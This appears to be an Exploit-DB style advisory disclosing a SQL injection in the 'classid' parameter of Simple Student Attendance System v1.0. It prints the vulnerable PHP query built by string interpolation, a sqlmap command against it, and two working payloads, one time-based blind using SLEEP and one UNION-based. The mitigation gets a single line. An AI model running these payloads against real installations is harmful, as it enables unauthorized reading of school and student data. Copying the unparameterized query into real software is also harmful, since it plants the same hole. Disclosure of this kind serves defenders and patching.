Simple Student Attendance System v1.0 - Time Based Blind & Union Based SQL Injection

vendor:

Simple Student Attendance System

by:

Gnanaraj Mauviel

8.1

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Simple Student Attendance System

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE:

CPE: a:oretnom23:simple_student_attendance_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Mac OSX, XAMPP, Apache, MySQL

2023

Simple Student Attendance System v1.0 – Time Based Blind & Union Based SQL Injection

The Simple Student Attendance System v1.0 is vulnerable to 'classid' Time Based Blind and Union Based SQL Injection. An attacker can manipulate the 'classid' parameter to execute arbitrary SQL queries.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Simple Student Attendance System v1.0 -  'classid' Time Based Blind & Union Based SQL Injection
# Date: 26 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(/php-attendance/classes/actions.class.php):

public function attendanceStudents($class_id = "", $class_date = ""){
if(empty($class_id) || empty($class_date))
return [];
$sql = "SELECT `students_tbl`.*, COALESCE((SELECT `status` FROM `attendance_tbl` where `student_id` = `students_tbl`.id and `class_date` = '{$class_date}' ), 0) as `status` FROM `students_tbl` where `class_id` = '{$class_id}' order by `name` ASC";
$qry = $this->conn->query($sql);
$result = $qry->fetch_all(MYSQLI_ASSOC);
return $result;
}

-> sqlmap -u "http://localhost/php-attendance/?page=attendance&class_id=446&class_date=0002-02-20" --batch
---
Parameter: class_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=attendance&class_id=446' AND (SELECT 5283 FROM (SELECT(SLEEP(5)))zsWT) AND 'nqTi'='nqTi&class_date=0002-02-20

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: page=attendance&class_id=446' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x7154766a5453645a7a4d497071786a6f4b647a5a6d4162756c72636b4a4555746d555a5a71614d4c,0x71767a7a71),NULL-- -&class_date=0002-02-20
---